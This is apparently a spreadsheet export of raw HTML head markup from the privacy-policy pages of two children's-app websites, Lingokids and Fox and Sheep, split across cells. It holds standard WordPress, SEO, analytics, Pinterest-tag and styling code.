&lt;script src='https://lingokids.com/wp-includes/js/jquery/jquery.min.js?ver=0e850a69bc7f' id='jquery-core-js' defer&gt;&lt;/script&gt;
&lt;script src='https://lingokids.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=5cfa2b481de6' id='jquery-migrate-js' defer&gt;&lt;/script&gt;
&lt;script src='https://lingokids.com/wp-content/plugins/duracelltomi-google-tag-manager/js/gtm4wp-woocommerce-enhanced.js?ver=1.16.2' id='gtm4wp-woocommerce-enhanced-js' defer&gt;&lt;/script&gt;
&lt;link rel="https://api.w.org/" href="https://lingokids.com/wp-json/" /&gt;&lt;link rel="alternate" type="application/json" href="https://lingokids.com/wp-json/wp/v2/pages/38615" /&gt;&lt;link</t>
  </si>
  <si>
    <t>rel="EditURI" type="application/rsd+xml" title="RSD" href="https://lingokids.com/xmlrpc.php?rsd" /&gt;
&lt;link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://lingokids.com/wp-includes/wlwmanifest.xml" /&gt;
&lt;link rel='shortlink' href='https://lingokids.com/?p=38615' /&gt;
&lt;link rel="alternate" type="application/json+oembed" href="https://lingokids.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Flingokids.com%2Fprivacy-policy" /&gt;
&lt;link rel="alternate" type="text/xml+oembed" href="https://lingokids.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Flingokids.com%2Fprivacy-policy&amp;#038;format=xml" /&gt;
	&lt;script type="text/javascript" src="data:text/javascript,var%20ajax_url%20%3D%20%27https%3A%2F%2Flingokids.com%2Fwp-admin%2Fadmin-ajax.php%27%3B%0A%09%09var%20ajax_nonce%20%3D%20%271e62511325%27%3B" defer&gt;&lt;/script&gt;&lt;script src="data:text/javascript,var%20el_i13_login_captcha%3Dnull%3B%20var%20el_i13_register_captcha%3Dnull%3B" defer&gt;&lt;/script&gt;&lt;script src="data:text/javascript,document.addEventListener%28%22DOMContentLoaded%22%2C%20function%28event%29%20%7B%20%0D%0A%09jQuery%28%27%23back-to-top%20a%27%29.click%28function%28%29%7B%20%0D%0A%09window.scrollTo%28%7Btop%3A%200%2C%20behavior%3A%20%22smooth%22%7D%29%3B%20return%20false%3B%0D%0A%09%7D%29%3B%20%0D%0A%09%7D%29%3B" defer&gt;&lt;/script&gt;_x005F_x000D_
_x005F_x000D_
_x005F_x000D_
&lt;!-- Global site tag (gtag.js) - Google Analytics --&gt;_x005F_x000D_
&lt;!--</t>
  </si>
  <si>
    <t>&lt;script async src="https://www.googletagmanager.com/gtag/js?id=UA-43880007-2" defer&gt;&lt;/script&gt;_x005F_x000D_
&lt;script src="data:text/javascript,%C2%A0%C2%A0window.dataLayer%20%3D%20window.dataLayer%20%7C%7C%20%5B%5D%3B%0D%0A%C2%A0%C2%A0function%20gtag%28%29%7BdataLayer.push%28arguments%29%3B%7D%0D%0A%C2%A0%C2%A0gtag%28%27js%27%2C%20new%20Date%28%29%29%3B%0D%0A%0D%0A%C2%A0%C2%A0gtag%28%27config%27%2C%20%27UA-43880007-2%27%29%3B" defer&gt;&lt;/script&gt;_x005F_x000D_
--&gt;_x005F_x000D_
_x005F_x000D_
&lt;!-- Google Tag Manager --&gt;_x005F_x000D_
&lt;script src="data:text/javascript,%28function%28w%2Cd%2Cs%2Cl%2Ci%29%7Bw%5Bl%5D%3Dw%5Bl%5D%7C%7C%5B%5D%3Bw%5Bl%5D.push%28%7B%27gtm.start%27%3A%0D%0Anew%20Date%28%29.getTime%28%29%2Cevent%3A%27gtm.js%27%7D%29%3Bvar%20f%3Dd.getElementsByTagName%28s%29%5B0%5D%2C%0D%0Aj%3Dd.createElement%28s%29%2Cdl%3Dl%21%3D%27dataLayer%27%3F%27%26l%3D%27%2Bl%3A%27%27%3Bj.async%3Dtrue%3Bj.src%3D%0D%0A%27https%3A%2F%2Fwww.googletagmanager.com%2Fgtm.js%3Fid%3D%27%2Bi%2Bdl%3Bf.parentNode.insertBefore%28j%2Cf%29%3B%0D%0A%7D%29%28window%2Cdocument%2C%27script%27%2C%27dataLayer%27%2C%27GTM-WC2PLW%27%29%3B" defer&gt;&lt;/script&gt;_x005F_x000D_
&lt;!-- End Google Tag Manager --&gt;_x005F_x000D_
_x005F_x000D_
_</t>
  </si>
  <si>
    <t>x000D_
	&lt;style&gt;img#wpstats{display:none}&lt;/style&gt;
&lt;!-- Google Tag Manager for WordPress by gtm4wp.com --&gt;
&lt;!-- GTM Container placement set to off --&gt;
&lt;script data-cfasync="false" data-pagespeed-no-defer type="text/javascript" src="data:text/javascript,var%20dataLayer_content%20%3D%20%5B%5D%3B%0A%09dataLayer.push%28%20dataLayer_content%20%29%3B" defer&gt;&lt;/script&gt;
&lt;script src="data:text/javascript,console.warn%20%26%26%20console.warn%28%22%5BGTM4WP%5D%20Google%20Tag%20Manager%20container%20code%20placement%20set%20to%20OFF%20%21%21%21%22%29%3B%0A%09console.warn%20%26%26%20console.warn%28%22%5BGTM4WP%5D%20Data%20layer%20codes%20are%20active%20but%20GTM%20container%20must%20be%20loaded%20using%20custom%20coding%20%21%21%21%22%29%3B" defer&gt;&lt;/script&gt;
&lt;!--</t>
  </si>
  <si>
    <t>End Google Tag Manager for WordPress by gtm4wp.com --&gt;
      &lt;!-- Pinterest Tag --&gt;
&lt;script src="data:text/javascript,%21function%28e%29%7Bif%28%21window.pintrk%29%7Bwindow.pintrk%20%3D%20function%20%28%29%20%7B%0Awindow.pintrk.queue.push%28Array.prototype.slice.call%28arguments%29%29%7D%3Bvar%0A%20%20n%3Dwindow.pintrk%3Bn.queue%3D%5B%5D%2Cn.version%3D%223.0%22%3Bvar%0A%20%20t%3Ddocument.createElement%28%22script%22%29%3Bt.async%3D%210%2Ct.src%3De%3Bvar%0A%20%20r%3Ddocument.getElementsByTagName%28%22script%22%29%5B0%5D%3B%0A%20%20r.parentNode.insertBefore%28t%2Cr%29%7D%7D%28%22https%3A%2F%2Fs.pinimg.com%2Fct%2Fcore.js%22%29%3B%0Apintrk%28%27load%27%2C%20%272613246001233%27%2C%20%7Bem%3A%20%27%3Cuser_email_address%3E%27%7D%29%3B%0Apintrk%28%27page%27%29%3B" defer&gt;&lt;/script&gt;
&lt;noscript&gt;
&lt;img height="0" width="0" style="display:none;" alt=""
  src="https://ct.pinterest.com/v3/?event=init&amp;tid=2613246001233&amp;pd[em]=&lt;hashed_email_address loading="lazy" decoding="async" fetchpriority="low"&gt;&amp;noscript=1" /&gt;
&lt;/noscript&gt;
&lt;!-- end Pinterest Tag --&gt;
    	&lt;noscript&gt;&lt;style&gt;.woocommerce-product-gallery{ opacity: 1 !important; }&lt;/style&gt;&lt;/noscript&gt;
	&lt;meta name="generator" content="Elementor 3.12.1; features: a11y_improvements, additional_custom_breakpoints; settings: css_print_method-external, google_font-enabled, font_display-auto"&gt;
		&lt;style type="text/css"&gt;.recentcomments a {
				display: inline !important;
				padding: 0 !important;
				margin: 0 !important;
			}
			table.recentcommentsavatartop img.avatar, table.recentcommentsavatarend img.avatar {
				border: 0px;
				margin: 0;
			}
			table.recentcommentsavatartop a, table.recentcommentsavatarend a {
				border: 0px !important;
				background-color: transparent !important;
			}
			td.recentcommentsavatarend, td.recentcommentsavatartop {
				padding: 0px 0px 1px 0px;
				margin: 0px;
			}
			td.recentcommentstextend {
				border: none !important;
				padding: 0px 0px 2px 10px;
			}
			.rtl td.recentcommentstextend {
				padding: 0px 10px 2px 0px;
			}
			td.recentcommentstexttop {
				border: none;
				padding:</t>
  </si>
  <si>
    <t>0px 0px 0px 10px;
			}
			.rtl td.recentcommentstexttop {
				padding: 0px 10px 0px 0px;
			}&lt;/style&gt;
		&lt;meta name="generator" content="Powered by Slider Revolution 6.6.12 - responsive, Mobile-Friendly Slider Plugin for WordPress with comfortable drag and drop interface." /&gt;
&lt;link rel="icon" href=</t>
  </si>
  <si>
    <t>&lt;!DOCTYPE html&gt;_x005F_x000D_
&lt;html lang="en-US"&gt;_x005F_x000D_
&lt;head&gt;_x005F_x000D_
	&lt;meta charset="UTF-8"&gt;_x005F_x000D_
	&lt;meta name="viewport" content="width=device-width"&gt;_x005F_x000D_
	&lt;meta name="format-detection" content="telephone=no"&gt;_x005F_x000D_
	&lt;link rel="profile" href="http://gmpg.org/xfn/11"&gt;_x005F_x000D_
	&lt;link rel="pingback" href="https://www.foxandsheep.com/xmlrpc.php"&gt;_x005F_x000D_
	    &lt;script type="text/javascript"&gt;
        / * Google Analytics Opt-Out by WP-Buddy | https://wp-buddy.com/products/plugins/google-analytics-opt-out */
				        var gaoop_property = 'UA-80769536-1';
        var gaoop_disable_str = 'ga-disable-' + gaoop_property;
		         if (document.cookie.indexOf(gaoop_disable_str + '=true') &gt; -1) {
            window[gaoop_disable_str] = true;
        }
        function gaoop_analytics_optout() {
            document.cookie = gaoop_disable_str + '=true; expires=Thu, 31 Dec 2099 23:59:59 UTC; SameSite=Strict; path=/';
            window[gaoop_disable_str] = true;
			alert('Thanks.</t>
  </si>
  <si>
    <t>We have set a cookie so that Google Analytics data collection will be disabled on your next visit.');        }
		    &lt;/script&gt;
	&lt;meta name='robots' content='index, follow, max-image-preview:large, max-snippet:-1, max-video-preview:-1' /&gt;
&lt;link rel="alternate" hreflang="en" href="https://www.foxandsheep.com/privacy-policy-apps/" /&gt;
&lt;link rel="alternate" hreflang="de" href="https://www.foxandsheep.de/privacy-policy-apps/" /&gt;
&lt;link rel="alternate" hreflang="x-default" href="https://www.foxandsheep.com/privacy-policy-apps/" /&gt;
	&lt;!-- This site is optimized with the Yoast SEO plugin v19.14 - https://yoast.com/wordpress/plugins/seo/ --&gt;
	&lt;title&gt;Privacy Policy Apps | Fox and Sheep&lt;/title&gt;
	&lt;link rel="canonical" href="https://www.foxandsheep.com/privacy-policy-apps/" /&gt;
	&lt;meta property="og:locale" content="en_US" /&gt;
	&lt;meta property="og:type" content="article" /&gt;
	&lt;meta property="og:title" content="Privacy Policy Apps | Fox and Sheep" /&gt;
	&lt;meta property="og:url" content="https://www.foxandsheep.com/privacy-policy-apps/" /&gt;
	&lt;meta property="og:site_name" content="Fox and Sheep" /&gt;
	&lt;meta property="article:publisher" content="https://www.facebook.com/foxandsheep" /&gt;
	&lt;meta property="article:modified_time" content="2022-02-15T16:24:04+00:00" /&gt;
	&lt;meta property="og:image" content="https://www.foxandsheep.com/wp-content/uploads/2017/12/FoxAndSheep_AppsForKids.jpg" /&gt;
	&lt;meta property="og:image:width" content="1200" /&gt;
	&lt;meta property="og:image:height" content="630" /&gt;
	&lt;meta property="og:image:type" content="image/jpeg" /&gt;
	&lt;meta name="twitter:label1" content="Est. reading time" /&gt;
	&lt;meta name="twitter:data1" content="24 minutes" /&gt;
	&lt;script type="application/ld+json" class="yoast-schema-graph"&gt;{"@context":"https://schema.org","@graph":[{"@type":"WebPage","@id":"https://www.foxandsheep.com/privacy-policy-apps/","url":"https://www.foxandsheep.com/privacy-policy-apps/","name":"Privacy Policy Apps | Fox and Sheep","isPartOf":{"@id":"https://www.foxandsheep.com/#website"},"datePublished":"2019-01-16T10:19:17+00:00","dateModified":"2022-02-15T16:24:04+00:00","breadcrumb":{"@id":"https://www.foxandsheep.com/privacy-policy-apps/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https://www.foxandsheep.com/privacy-policy-apps/"]}]},{"@type":"BreadcrumbList","@id":"https://www.foxandsheep.com/privacy-policy-apps/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https://www.foxandsheep.com/"},{"@type":"ListItem","position":2,"name":"Privacy Policy Apps"}]},{"@type":"WebSite","@id":"https://www.foxandsheep.com/#website","url":"https://www.foxandsheep.com/","name":"Fox and Sheep","description":"Apps for kids","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https://www.foxandsheep.com/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"en-US"}]}&lt;/script&gt;
	&lt;!-- / Yoast SEO plugin.</t>
  </si>
  <si>
    <t>--&gt;
&lt;link rel='dns-prefetch' href='//www.foxandsheep.com' /&gt;
&lt;link rel="alternate" type="application/rss+xml" title="Fox and Sheep &amp;raquo; Feed" href="https://www.foxandsheep.com/feed/" /&gt;
&lt;link rel="alternate" type="application/rss+xml" title="Fox and Sheep &amp;raquo; Comments Feed" href="https://www.foxandsheep.com/comments/feed/" /&gt;
&lt;script type="text/javascript"&gt;
window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/14.0.0\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/14.0.0\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/www.foxandsheep.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.1.1"}};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 o.length;r++)t.supports[o[r]]=function(e){if(p&amp;&amp;p.fillText)switch(p.textBaseline="top",p.font="600 32px</t>
  </si>
  <si>
    <t>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[129777,127995,8205,129778,127999],[129777,127995,8203,129778,127999])}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id='wp-block-library-css' href='https://www.foxandsheep.com/wp-includes/css/dist/block-library/style.min.css?ver=6.1.1' type='text/css' media='all' /&gt;
&lt;style id='metaphorcreations-ditty-style-inline-css' type='text/css'&gt;
&lt;/style&gt;
&lt;link rel='stylesheet' id='classic-theme-styles-css' href='https://www.foxandsheep.com/wp-includes/css/classic-themes.min.css?ver=1'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t>
  </si>
  <si>
    <t xml:space="preserve">important;}
.wp-block-navigation a:where(:not(.wp-element-button)){color: inherit;}
:where(.wp-block-columns.is-layout-flex){gap: 2em;}
.wp-block-pullquote{font-size: 1.5em;line-height: 1.6;}
&lt;/style&gt;
&lt;link rel='stylesheet' id='contact-form-7-css' href='https://www.foxandsheep.com/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.7.2' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='ditty-news-ticker-font-css' href='https://www.foxandsheep.com/wp-content/plugins/ditty-news-ticker/legacy/inc/static/libs/fontastic/styles.css?ver=3.0.32' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='ditty-news-ticker-css' href='https://www.foxandsheep.com/wp-content/plugins/ditty-news-ticker/legacy/inc/static/css/style.css?ver=3.0.32' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='ditty-css' href='https://www.foxandsheep.com/wp-content/plugins/ditty-news-ticker/includes/css/ditty.css?ver=3.0.32' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='ditty-displays-css' href='https://www.foxandsheep.com/wp-content/plugins/ditty-news-ticker/includes/css/ditty-displays.css?ver=3.0.32' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='ditty-fontawesome-css' href='https://www.foxandsheep.com/wp-content/plugins/ditty-news-ticker//includes/libs/fontawesome-6.2.0/css/all.css?ver=6.2.0' type='text/css' media='' /&gt;
&lt;link rel='stylesheet' id='ditty-editor-css' href='https://www.foxandsheep.com/wp-content/plugins/ditty-news-ticker/includes/css/ditty-editor.css?ver=3.0.32' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='dashicons-css' href='https://www.foxandsheep.com/wp-includes/css/dashicons.min.css?ver=6.1.1' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='post-views-counter-frontend-css' href='https://www.foxandsheep.com/wp-content/plugins/post-views-counter/css/frontend.min.css?ver=1.3.12' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='rs-plugin-settings-css' href='https://www.foxandsheep.com/wp-content/plugins/revslider/public/assets/css/settings.css?ver=5.4.8.3' type='text/css' media='all' /&gt;
&lt;style id='rs-plugin-settings-inline-css' type='text/css'&gt;
#rs-demo-id {}
&lt;/style&gt;
&lt;link rel='stylesheet' id='wpml-menu-item-0-css' href='//www.foxandsheep.com/wp-content/plugins/sitepress-multilingual-cms/templates/language-switchers/menu-item/style.min.css?ver=1' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='bootstrap-css' href='https://www.foxandsheep.com/wp-content/themes/sweetmielo/assets/css/bootstrap-grid.css?ver=1.0' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='sweetmielo-plugins-css-css' href='https://www.foxandsheep.com/wp-content/themes/sweetmielo/assets/css/plugins.css?ver=1.0' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='sweetmielo-theme-style-css' href='https://www.foxandsheep.com/wp-content/themes/sweetmielo-child/style.css?ver=1.0' type='text/css' media='all' /&gt;
&lt;style id='sweetmielo-theme-style-inline-css' type='text/css'&gt;
nav.navbar .logo img { max-height: 75px; } 
			:root {			  --black:  #707070;			  --gray:   #e1ebf2;			  --white:  #ffffff;			  --main:   #90aac9;			   --second:   #bed2d2;			  			  --font-main:   'Open Sans';			  --font-headers: 'Fredoka One';			  			}				
&lt;/style&gt;
&lt;link rel='stylesheet' id='font-awesome-css' href='https://www.foxandsheep.com/wp-content/plugins/unyson/framework/static/libs/font-awesome/css/font-awesome.min.css?ver=2.7.24' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='js_composer_front-css' href='https://www.foxandsheep.com/wp-content/plugins/js_composer/assets/css/js_composer.min.css?ver=6.10.0' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='fw-option-type-icon-v2-pack-linecons-css' href='https://www.foxandsheep.com/wp-content/plugins/unyson/framework/static/libs/linecons/css/linecons.css?ver=2.7.24' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='fw-option-type-icon-v2-pack-font-awesome-css' href='https://www.foxandsheep.com/wp-content/plugins/unyson/framework/static/libs/font-awesome/css/font-awesome.min.css?ver=2.7.24' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='fw-option-type-icon-v2-pack-entypo-css' href='https://www.foxandsheep.com/wp-content/plugins/unyson/framework/static/libs/entypo/css/entypo.css?ver=2.7.24' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='fw-option-type-icon-v2-pack-linearicons-css' href='https://www.foxandsheep.com/wp-content/plugins/unyson/framework/static/libs/lnr/css/lnr.css?ver=2.7.24' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='fw-option-type-icon-v2-pack-typicons-css' href='https://www.foxandsheep.com/wp-content/plugins/unyson/framework/static/libs/typcn/css/typcn.css?ver=2.7.24' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='fw-option-type-icon-v2-pack-unycon-css' href='https://www.foxandsheep.com/wp-content/plugins/unyson/framework/static/libs/unycon/unycon.css?ver=2.7.24' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='magnific-popup-css' href='https://www.foxandsheep.com/wp-content/themes/sweetmielo/assets/css/magnific-popup.css?ver=1.1.0' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='sweetmielo_google_fonts-css' href='https://www.foxandsheep.com/wp-content/uploads/fonts/47b8e5899d903794367191552bbc11d7/font.css?v=1674128412' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='vc_font_awesome_5_shims-css' href='https://www.foxandsheep.com/wp-content/plugins/js_composer/assets/lib/bower/font-awesome/css/v4-shims.min.css?ver=6.10.0' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='vc_font_awesome_5-css' href='https://www.foxandsheep.com/wp-content/plugins/js_composer/assets/lib/bower/font-awesome/css/all.min.css?ver=6.10.0' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='parent-style-css' href='https://www.foxandsheep.com/wp-content/themes/sweetmielo/style.css?ver=6.1.1' type='text/css' media='all' /&gt;
&lt;style id='parent-style-inline-css' type='text/css'&gt;
			:root {			  --black:  #707070;			  --gray:   #e1ebf2;			  --white:  #ffffff;			  --main:   #90aac9;			  </t>
  </si>
  <si>
    <t>--second:   #bed2d2;			  			  --font-main:   'Open Sans';			  --font-headers: 'Fredoka One';			  			}				
&lt;/style&gt;
&lt;script type='text/javascript' src='https://www.foxandsheep.com/wp-includes/js/jquery/jquery.min.js?ver=3.6.1' id='jquery-core-js'&gt;&lt;/script&gt;
&lt;script type='text/javascript' src='https://www.foxandsheep.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.3.2' id='jquery-migrate-js'&gt;&lt;/script&gt;
&lt;script type='text/javascript' src='https://www.foxandsheep.com/wp-content/plugins/revslider/public/assets/js/jquery.themepunch.tools.min.js?ver=5.4.8.3' id='tp-tools-js'&gt;&lt;/script&gt;
&lt;script type='text/javascript' src='https://www.foxandsheep.com/wp-content/plugins/revslider/public/assets/js/jquery.themepunch.revolution.min.js?ver=5.4.8.3' id='revmin-js'&gt;&lt;/script&gt;
&lt;script type='text/javascript' src='https://www.foxandsheep.com/wp-content/themes/sweetmielo/assets/js/modernizr-2.6.2.min.js?ver=2.6.2' id='modernizr-js'&gt;&lt;/script&gt;
&lt;script type='text/javascript' id='wpml-xdomain-data-js-extra'&gt;
/* &lt;! [CDATA[ */
var wpml_xdomain_data = {"css_selector":"wpml-ls-item","ajax_url":"https:\/\/www.foxandsheep.com\/wp-admin\/admin-ajax.php","current_lang":"en"};
/* ]]&gt; */
&lt;/script&gt;
&lt;script type='text/javascript' src='https://www.foxandsheep.com/wp-content/plugins/sitepress-multilingual-cms/res/js/xdomain-data.js?ver=4.5.14' id='wpml-xdomain-data-js'&gt;&lt;/script&gt;
&lt;link rel="https://api.w.org/" href="https://www.foxandsheep.com/wp-json/" /&gt;&lt;link rel="alternate" type="application/json" href="https://www.foxandsheep.com/wp-json/wp/v2/pages/6266" /&gt;&lt;link</t>
  </si>
  <si>
    <t>rel="EditURI" type="application/rsd+xml" title="RSD" href="https://www.foxandsheep.com/xmlrpc.php?rsd" /&gt;
&lt;link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://www.foxandsheep.com/wp-includes/wlwmanifest.xml" /&gt;
&lt;meta name="generator" content="WordPress 6.1.1" /&gt;
&lt;link rel='shortlink' href='https://www.foxandsheep.com/?p=6266' /&gt;
&lt;link rel="alternate" type="application/json+oembed" href="https://www.foxandsheep.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.foxandsheep.com%2Fprivacy-policy-apps%2F" /&gt;
&lt;link rel="alternate" type="text/xml+oembed" href="https://www.foxandsheep.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.foxandsheep.com%2Fprivacy-policy-apps%2F&amp;#038;format=xml" /&gt;
&lt;meta name="generator" content="WPML ver:4.5.14 stt:1,3;" /&gt;
&lt;style type="text/css"&gt;/** Google Analytics Opt Out Custom CSS **/.gaoop {color: #ffffff; line-height: 2; position: fixed; bottom: 0; left: 0; width: 100%; -webkit-box-shadow: 0 4px 15px rgba(0, 0, 0, 0.4); -moz-box-shadow: 0 4px 15px rgba(0, 0, 0, 0.4); box-shadow: 0</t>
  </si>
  <si>
    <t>4px 15px rgba(0, 0, 0, 0.4); background-color: #0E90D2; padding: 1rem; margin: 0; display: flex; align-items: center; justify-content: space-between; } .gaoop-hidden {display: none; } .gaoop-checkbox:checked + .gaoop {width: auto; right: 0; left: auto; opacity: 0.5; ms-filter: "progid:DXImageTransform. Microsoft.Alpha(Opacity=50)"; filter: alpha(opacity=50); -moz-opacity: 0.5; -khtml-opacity: 0.5; } .gaoop-checkbox:checked + .gaoop .gaoop-close-icon {display: none; } .gaoop-checkbox:checked + .gaoop .gaoop-opt-out-content {display: none; } input.gaoop-checkbox {display: none; } .gaoop a {color: #67C2F0; text-decoration: none; } .gaoop a:hover {color: #ffffff; text-decoration: underline; } .gaoop-info-icon {margin: 0; padding: 0; cursor: pointer; } .gaoop svg {position: relative; margin: 0; padding: 0; width: auto; height: 25px; } .gaoop-close-icon {cursor: pointer; position: relative; opacity: 0.5; ms-filter: "progid:DXImageTransform.</t>
  </si>
  <si>
    <t>Microsoft.Alpha(Opacity=50)"; filter: alpha(opacity=50); -moz-opacity: 0.5; -khtml-opacity: 0.5; margin: 0; padding: 0; text-align: center; vertical-align: top; display: inline-block; } .gaoop-close-icon:hover {z-index: 1; opacity: 1; ms-filter: "progid:DXImageTransform. Microsoft.Alpha(Opacity=100)"; filter: alpha(opacity=100); -moz-opacity: 1; -khtml-opacity: 1; } .gaoop_closed .gaoop-opt-out-link, .gaoop_closed .gaoop-close-icon {display: none; } .gaoop_closed:hover {opacity: 1; ms-filter: "progid:DXImageTransform. Microsoft.Alpha(Opacity=100)"; filter: alpha(opacity=100); -moz-opacity: 1; -khtml-opacity: 1; } .gaoop_closed .gaoop-opt-out-content {display: none; } .gaoop_closed .gaoop-info-icon {width: 100%; } .gaoop-opt-out-content {display: inline-block; vertical-align: top; } &lt;/style&gt;&lt;meta name="generator" content="Powered by WPBakery Page Builder - drag and drop page builder for WordPress.</t>
  </si>
  <si>
    <t>"/&gt;
&lt;style type="text/css"&gt;.broken_link, a.broken_link {_x005F_x000D_
	text-decoration: line-through;_x005F_x000D_
}&lt;/style&gt;&lt;meta name="generator" content="Powered by Slider Revolution 5.4.8.3 - responsive, Mobile-Friendly Slider Plugin for WordPress with comfortable drag and drop interface." /&gt;
&lt;link rel="icon" href="https://www.foxandsheep.com/wp-content/uploads/2020/06/cropped-Favicon-32x32.jpg" sizes="32x32" /&gt;
&lt;link rel="icon" href="https://www.foxandsheep.com/wp-content/uploads/2020/06/cropped-Favicon-192x192.jpg" sizes="192x192" /&gt;
&lt;link rel="apple-touch-icon" href="https://www.foxandsheep.com/wp-content/uploads/2020/06/cropped-Favicon-180x180.jpg" /&gt;
&lt;meta name="msapplication-TileImage" content="https://www.foxandsheep.com/wp-content/uploads/2020/06/cropped-Favicon-270x270.jpg" /&gt;
&lt;script type="text/javascript"&gt;function setREVStartSize(e){									_x005F_x000D_
						try{ e.c=jQuery(e.c);var i=jQuery(window).width(),t=9999,r=0,n=0,l=0,f=0,s=0,h=0;_x005F_x000D_
							if(e.responsiveLevels&amp;&amp;(jQuery.each(e.responsiveLevels,function(e,f){f&gt;i&amp;&amp;(t=r=f,l=e),i&gt;f&amp;&amp;f&gt;r&amp;&amp;(r=f,n=e)}),t&gt;r&amp;&amp;(l=n)),f=e.gridheight[l]||e.gridheight[0]||e.gridheight,s=e.gridwidth[l]||e.gridwidth[0]||e.gridwidth,h=i/s,h=h&gt;1?1:h,f=Math.round(h*f),"fullscreen"==e.sliderLayout){var u=(e.c.width(),jQuery(window).height());if(void 0!=e.fullScreenOffsetContainer){var c=e.fullScreenOffsetContainer.split(",");if (c) jQuery.each(c,function(e,i){u=jQuery(i).length&gt;0?u-jQuery(i).outerHeight(!0):u}),e.fullScreenOffset.split("%").length&gt;1&amp;&amp;void 0!=e.fullScreenOffset&amp;&amp;e.fullScreenOffset.length&gt;0?u-=jQuery(window).height()*parseInt(e.fullScreenOffset,0)/100:void 0!=e.fullScreenOffset&amp;&amp;e.fullScreenOffset.length&gt;0&amp;&amp;(u-=parseInt(e.fullScreenOffset,0))}f=u}else void 0!=e.minHeight&amp;&amp;f&lt;e.minHeight&amp;&amp;(f=e.minHeight);e.c.closest(".rev_slider_wrapper").css({height:f})					_ x000D_
						}catch(d){console.log("Failure at Presize of Slider:"+d)}						_x005F_x000D_
					};&lt;/script&gt;
		&lt;style type="text/css" id="wp-custom-css"&gt;
			html,
body,
div,
table {
  font-size: 22px;
  line-height: 1.6em;
	font-weight: 300;
}
/* Links */
a {
	color: #537BAD;
	text-decoration: underline;
}
a:hover {
	color: #90aac9;
	text-decoration: underline;
}
a:clicked {
	color: #90aac9;
	text-decoration: underline;
}
:target::before {
  content: "";
  display: block;
  height: 200px; /* fixed header height*/
  margin: -200px 0 0; /* negative fixed header height */
}
/* Video container */
.image-video span.image {
  max-height: 700px;
}
/* Waves */
.waves_left</t>
  </si>
  <si>
    <t>{
	background: #bed2d2 url(/wp-content/uploads/2018/12/footer-blue-waves.png?id=5901) ! important;
	background-position: right top !important;
	background-repeat: repeat !important;
}
/* Headings letter spacing */
h1, h2, h3, h4, h5 {
 letter-spacing: 1px;
 font-weight: normal;
}
/* Footer */
.copyright-block p {
	background-color: #90aac9;
	color: white;
}
.copyright-block a {
	color: white;
	font-weight: bold;
}
.copyright-block.copyright-layout-copyright_waves {
	background: #90aac9;
	margin: 0px;
  padding: 10px;
}
.copyright-block.copyright-layout-copyright_waves .container {
	padding: 0px;
	margin: 0px;
}
/*</t>
  </si>
  <si>
    <t>Newsletter form */
form.mc4wp-form-806 input:not([type="submit"]):not([type="button"]):not([type="radio"]):not([type="checkbox"]) {
	display: inline;
	width: 350px;
	padding: 16px;
	padding-right: 80px;
	font-family: Fredoka One;
	letter-spacing:1px;
	font-size: 16px;
	color: #707070;
}
.mc4wp-form-806 {
	margin-left:auto;
	margin-right:auto;
}
.mc4wp-form-806 input.newsletter-button {
	margin-left: -60px;
	display: inline;
	padding: 16px;
	font-family: Fredoka One;
	font-size: 16px;
  letter-spacing:1px;
		background-color: #69D1C3;
		font-weight: normal;
}
@media only screen and (max-width: 768px) {
	.mc4wp-form-806 input.newsletter-button {
		margin-left: 0px;
		margin-top: 10px;
	}
}
form.mc4wp-form-806 div.newsletter-terms-container {
 margin-left: auto;
	margin-right: auto;
	font-size: 14px;
	margin-top: 12px;
	color: white;
}
form.mc4wp-form-806 div.newsletter-lists-container {
	color: white;
	font-family: Fredoka One;
	 letter-spacing:1px;
	margin-bottom: 12px;
}
.mc4wp-form-806 a {
	color: white;
}
/* Contact form */
form.wpcf7-form label {
	color: #707070;
}
.contact-form-terms-container .wpcf7-form-control-wrap {
	display: inline;
}
div.wpcf7-response-output {
	color: #707070;
}
/* Stoerer */
.stoerer {
  position: absolute;
  top: 30px;
  right: -30px;
  width: 230px;
  height: 230px;
  background-color: #ffd166;
  border-radius: 50%;
  text-align: center;
  color: white;
}
.stoerer a {
  color: white;
	font-family: Fredoka One;
  text-decoration: none;
}
.stoerer p {
	font-size: x-large;
	line-height: 1.3em;
}
